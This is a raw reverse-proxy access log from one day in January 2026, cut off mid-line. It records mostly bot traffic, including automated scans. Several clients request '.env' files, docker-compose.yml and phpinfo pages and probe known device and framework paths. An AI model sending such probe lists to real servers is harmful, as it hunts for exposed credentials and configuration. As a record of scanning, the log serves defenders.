"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:34:40 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:37:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 151.242.144.223] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[23/Jan/2026:08:37:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.237.109.172] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:08:37:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 172.237.109.172] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" +[23/Jan/2026:08:50:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:53:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:08:54:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:09:02:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:09:11:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:09:11:11 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:09:17:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:09:22:54 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[23/Jan/2026:09:24:57 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:09:33:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 64.82.206.195] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[23/Jan/2026:09:33:01 +0000] 405 - POST http 91.82.83.208 "/" [Client 64.82.206.195] [Length 154] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[23/Jan/2026:09:39:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:09:41:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:09:50:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.168.5.220] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:09:50:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.197.152] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:09:54:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:10:01:39 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:10:03:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:10:09:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:10:16:01 +0000] 400 - GET http 91.82.83.208 "/" [Client 20.65.219.131] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:10:16:01 +0000] 400 - - http localhost "-" [Client 20.65.219.131] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:10:22:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:10:25:08 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[23/Jan/2026:10:34:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:10:37:55 +0000] 404 - GET http 91.82.83.208 "/hudson" [Client 40.124.175.174] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:10:47:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:10:51:43 +0000] 404 - GET http 91.82.83.208.pool.invitel.hu "/.env" [Client 4.227.89.40] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[23/Jan/2026:10:53:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/.env" [Client 4.227.89.40] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[23/Jan/2026:10:53:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 4.227.89.40] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[23/Jan/2026:10:59:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:11:01:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:11:08:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[23/Jan/2026:11:17:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:11:23:34 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 216.180.246.152] [Length 1033] [Gzip -] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[23/Jan/2026:11:23:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.152] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:11:24:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 216.180.246.152] [Length 568] [Gzip 1.86] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[23/Jan/2026:11:24:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:11:30:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.152] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:11:30:55 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:11:31:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.157.172.39] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:11:32:16 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:11:42:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:11:43:53 +0000] 400 - - http localhost "-" [Client 157.230.237.154] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:11:51:02 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 208.84.101.154] [Length 0] [Gzip -] "-" "-" +[23/Jan/2026:11:52:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:12:01:08 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36" "-" +[23/Jan/2026:12:01:08 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Opera/9.80 (Windows 98; U; de) Presto/2.6.30 Version/10.61" "-" +[23/Jan/2026:12:01:08 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.1.1; Z982 Build/NMF26V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36" "-" +[23/Jan/2026:12:01:09 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "-" +[23/Jan/2026:12:01:09 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1" "-" +[23/Jan/2026:12:01:10 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" +[23/Jan/2026:12:01:10 +0000] 200 - GET http 91.82.83.208 "/?phpinfo=-1" [Client 78.153.140.224] [Length 1033] [Gzip -] "More Firefox 3.5 user agents strings -->>" "-" +[23/Jan/2026:12:01:10 +0000] 404 - GET http 91.82.83.208 "/Media/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1" "-" +[23/Jan/2026:12:01:10 +0000] 404 - GET http 91.82.83.208 "/Demo/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.31 (KHTML, like Gecko) Chrome/13.0.748.0 Safari/534.31" "-" +[23/Jan/2026:12:01:10 +0000] 404 - GET http 91.82.83.208 "/.ENV" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20110913 Firefox/5.0" "-" +[23/Jan/2026:12:01:10 +0000] 404 - GET http 91.82.83.208 "/items/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; he-il; GT-I9105P Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/club/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; LG-K120 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/.env~" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1 MXiOS/4.8.7.60" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/owncloud/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 OPR/44.0.2510.1449" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/twilio/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en_CA) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/products/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SM-G550T1 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/.env/.env-sample" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3.1; en-us; Android SDK built for x86 Build/JB_MR2) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/info/phpinfo" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows 2000; U) Opera 7.0 [en]" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/debug/default" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36" "-" +[23/Jan/2026:12:01:11 +0000] 404 - GET http 91.82.83.208 "/.env1" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.18) Gecko/20081112 Fedora/2.0.0.18-1.fc8 Firefox/2.0.0.18" "-" +[23/Jan/2026:12:01:12 +0000] 404 - GET http 91.82.83.208 "/config.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)" "-" +[23/Jan/2026:12:01:12 +0000] 404 - GET http 91.82.83.208 "/laravel/public/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0" "-" +[23/Jan/2026:12:01:12 +0000] 404 - GET http 91.82.83.208 "/crm/.env.production" [Client 78.153.140.224] [Length 150] [Gzip -] "Opera/4.02 (Windows 98; U) [en]" "-" +[23/Jan/2026:12:01:12 +0000] 404 - GET http 91.82.83.208 "/docker-compose.yml" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; es-us; GT-S5301L Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[23/Jan/2026:12:01:12 +0000] 404 - GET http 91.82.83.208 "/configuration.yaml" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.54" "-" +[23/Jan/2026:12:01:12 +0000] 404 - GET http 91.82.83.208 "/api/phpinfo.php" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) WebClip/6534.51.13 Safari/6534.59.10" "-" +[23/Jan/2026:12:01:12 +0000] 404 - GET http 91.82.83.208 "/functions/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1; XT1528 Build/LPIS23.29-17.5-2) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.0.0 Mobile Safari/537.36" "-" +[23/Jan/2026:12:01:13 +0000] 404 - GET http 91.82.83.208 "/admin/phpinfo" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; HUAWEI H881C Build/HuaweiH881C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[23/Jan/2026:12:01:13 +0000] 400 - GET http 91.82.83.208 "/env.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:12:01:14 +0000] 400 - GET http 91.82.83.208 "/static/historypage.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:12:03:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:12:10:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:12:13:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:12:17:47 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:12:35:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:12:41:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:12:41:43 +0000] 400 - - http localhost "-" [Client 167.172.116.219] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:12:41:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.172.116.219] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:12:46:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 152.32.145.64] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[23/Jan/2026:12:46:16 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[23/Jan/2026:12:46:17 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 152.32.145.64] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[23/Jan/2026:12:46:21 +0000] 400 - GET http 91.82.83.208 "/" [Client 165.22.244.213] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[23/Jan/2026:13:02:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:13:05:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:13:06:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:13:31:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:13:32:42 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:13:32:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:13:49:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:13:56:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 152.231.58.107] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[23/Jan/2026:13:56:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.156.128.129] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[23/Jan/2026:13:56:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:13:59:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:14:21:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:14:22:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:14:43:34 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:14:44:25 +0000] 405 - POST http 91.82.83.208 "/" [Client 195.178.110.25] [Length 154] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[23/Jan/2026:14:44:25 +0000] 404 - POST http 91.82.83.208 "/_next" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[23/Jan/2026:14:44:26 +0000] 404 - POST http 91.82.83.208 "/api" [Client 195.178.110.25] [Length 122] [Gzip 1.35] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:14:44:26 +0000] 404 - POST http 91.82.83.208 "/_next/server" [Client 195.178.110.25] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136." "-" +[23/Jan/2026:14:44:26 +0000] 404 - POST http 91.82.83.208 "/app" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like 